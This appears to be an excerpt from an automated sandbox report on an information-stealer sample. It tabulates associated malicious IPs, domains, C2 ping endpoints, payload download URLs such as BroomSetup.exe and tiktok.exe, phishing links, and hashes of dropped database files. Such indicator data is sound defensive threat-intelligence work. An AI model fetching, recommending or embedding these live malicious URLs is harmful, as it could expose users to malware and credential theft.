12:16:29	API Interceptor	2x Sleep call for process: WerFault.exe modified
12:16:46	API Interceptor	227913x Sleep call for process: MSBuild.exe modified
12:16:48	API Interceptor	395302x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
12:16:50	API Interceptor	1x Sleep call for process: cmd.exe modified
12:17:10	API Interceptor	588028x Sleep call for process: IIIJECAEGD.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.90	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
185.172.128.228	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=seven
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=two
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
185.172.128.203	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.203/tiktok.exe
185.172.128.203	SecuriteInfo.com.Trojan.Siggen28.25504.27914.23637.exe	Get hash	malicious	Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	185.172.128.203/dl.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
svc.iolo.com	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
iolo0.b-cdn.net	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.97
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.251
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.246
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.246
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.99
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.244
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.97
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.243
note.padd.cn.com	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
bg.microsoft.map.fastly.net	https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2	Get hash	malicious	Unknown	Browse	199.232.214.172
	SaturdayNight.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	FTG_PD_04024024001.vbs	Get hash	malicious	FormBook, GuLoader	Browse	199.232.214.172
	SWIFT.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.232.210.172
	https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	Unknown	Browse	199.232.214.172
	page97.exe	Get hash	malicious	LonePage	Browse	199.232.210.172
	Minutes_of_15th_Session_of_PSC.pdf.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	KMj8h32vWy.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	199.232.214.172
	https://cos-aliyun8789.towqzg.cn/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://shining-melodic-magnesium.glitch.me/rvicendDev.html	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	185.172.128.19
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	tt1pR7pJbF.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	IvxnEUAtC3.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
NADYMSS-ASRU	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	185.172.128.19
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	tt1pR7pJbF.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	IvxnEUAtC3.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://starmicronics.com/support/download/starprnt-intelligence-software-setup-exe-file-v3-6-0a/#unlock	Get hash	malicious	Unknown	Browse	13.107.42.14
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	http://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://pub-839300a9c6054ed7b1c425122a9dd984.r2.dev/doc.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://www.bing.com/////////////////////ck/a?!&&p=0533e94aab0b2a6eJmltdHM9MTcxMzQ4NDgwMCZpZ3VpZD0xNDE4NDZmNi1iZWY1LTY4NjUtMjQ0YS01MjkwYmYwZTY5ODQmaW5zaWQ9NTIyMA&ptn=3&ver=2&hsh=3&fclid=141846f6-bef5-6865-244a-5290bf0e6984&u=a1aHR0cHM6Ly9reDRrc3IuYXJ0aWNsZXdyaXRpbmdnZW5lcmF0b3IueHl6Lw#vds2aa29aYmRldmluc0B3ZS13b3JsZHdpZGUuY29t	Get hash	malicious	HTMLPhisher	Browse	52.96.190.194
	http://electricalsworksflorida.com/j6u	Get hash	malicious	HTMLPhisher	Browse	13.107.213.69
	https://gamma.app/docs/Shared-Document-9j9g6z8iqo1w0uu	Get hash	malicious	HTMLPhisher	Browse	13.107.246.69
	https://calderamanufacturing-my.sharepoint.com/:b:/g/personal/rcuthbertson_summitsteelinc_com/EXRx7fLGAqJIpy0dNft_VNoBmqNR3C5b2tYm8DhDa2jZuQ?e=L3dfvE	Get hash	malicious	Unknown	Browse	52.104.109.39
	https://mewarpolytex123-my.sharepoint.com/:b:/g/personal/vikas_neema_mewarpolytex_com/EcuKXONpgCBJueK6mARkdzgBWKWYEsPlZVnvj9b8YAr_dA?e=GZh1gs	Get hash	malicious	Unknown	Browse	52.105.237.41
	https://cloudflare-ipfs.com/ipfs/bafkreiffz46tyqvifmyhjcdbynucd4duurmznmxaorlfjuwzovmtocshje	Get hash	malicious	HTMLPhisher	Browse	13.107.213.69
PINDC-ASRU	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	91.215.85.66
NADYMSS-ASRU	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	185.172.128.19
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	tt1pR7pJbF.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	IvxnEUAtC3.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://functional-adhesive-titanium.glitch.me/	Get hash	malicious	Unknown	Browse	173.222.162.32 169.150.236.98
	http://findersearching.com	Get hash	malicious	Unknown	Browse	173.222.162.32 169.150.236.98
	https://www.canva.com/design/DAGDNh45X_4/PPCLYIV4Y8uUaoEW7ZJrJQ/view?utm_content=DAGDNh45X_4&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	173.222.162.32 169.150.236.98
	https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2	Get hash	malicious	Unknown	Browse	173.222.162.32 169.150.236.98
	https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==	Get hash	malicious	HTMLPhisher	Browse	173.222.162.32 169.150.236.98
	Iu4csQ2rwX.msi	Get hash	malicious	AsyncRAT	Browse	173.222.162.32 169.150.236.98
	https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	Unknown	Browse	173.222.162.32 169.150.236.98
	http://survey-smiles.com	Get hash	malicious	Unknown	Browse	173.222.162.32 169.150.236.98
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	173.222.162.32 169.150.236.98
	http://rapnews.pl	Get hash	malicious	Unknown	Browse	173.222.162.32 169.150.236.98

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	Vk2yYa9dHl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	Vk2yYa9dHl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BGHIIJDGHCBFIECBKEGH

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGDBFBGI

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGHJKFHJJJKJJJJKEHCB

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIIIIJKFCAAECAKFIEHCGDHIEG

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\IJEBKKEGDBFIIEBFHIEHCBKJJK

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
